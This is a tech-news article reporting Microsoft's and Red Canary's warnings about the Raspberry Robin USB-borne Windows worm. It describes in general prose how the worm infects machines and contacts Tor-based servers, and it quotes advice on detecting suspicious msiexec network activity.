Microsoft Detects Raspberry Robin Windows Worm in Hundreds of Enterprise Networks


Microsoft has warned customers about a new high-risk worm called “Raspberry Robin” that is infecting Windows PCs. The software giant has privately informed some Microsoft Defender for Endpoint users that the malware has been discovered in hundreds of enterprise networks across various industries (via Bleeping Computer).

The Red Canary cybersecurity researchers first discovered Raspberry Robin in September last year. The researchers found that the worm spreads to new Windows machines via infected USB that contains a .LNK file. Once the user clicks on the file, the malware uses the command prompt to create a “msiexec” process and runs another malicious file on the compromised PC.

Additionally, the worm establishes a connection with its command and control (C2) server and uses Windows utilities to install additional malicious payloads on the victim’s system. The DLL files then attempt to communicate with Tor nodes.

Microsoft Detects Raspberry Robin Windows Worm in Hundreds of Enterprise Networks
Raspberry Robin worm infection flow (Source: Red Canary)

Microsoft explained in its security advisory that the Raspberry Robin worm has been connecting to several IP addresses on the TOR network. However, the attackers have yet to exploit this vulnerability in order to deploy ransomware or steal sensitive data from vulnerable Windows devices.

Microsoft categorizes Raspberry Robin as a high-risk campaign

Microsoft has classified Raspberry Robin as a high-risk campaign because it could allow the threat actors to infect entire corporate networks. The researchers have detailed some indicators to help IT admins detect the Raspberry Robin malware.

“To detect suspicious use of msiexec.exe by Raspberry Robin or other threats, it’s essential to take a look at the command line and the URL. Detecting msiexec.exe making outbound network connections to download and install packages in the command line interface will give you the opportunity to examine the activity and determine if it’s malicious or not,” Red Canary researchers explained.

The security researchers have also advised that customers should not connect suspicious USB devices to their Windows PCs in order to prevent Raspberry Robin infections. If you’re interested, we invite you to check out Red Canary’s report, which provides detailed insights into how the worm works.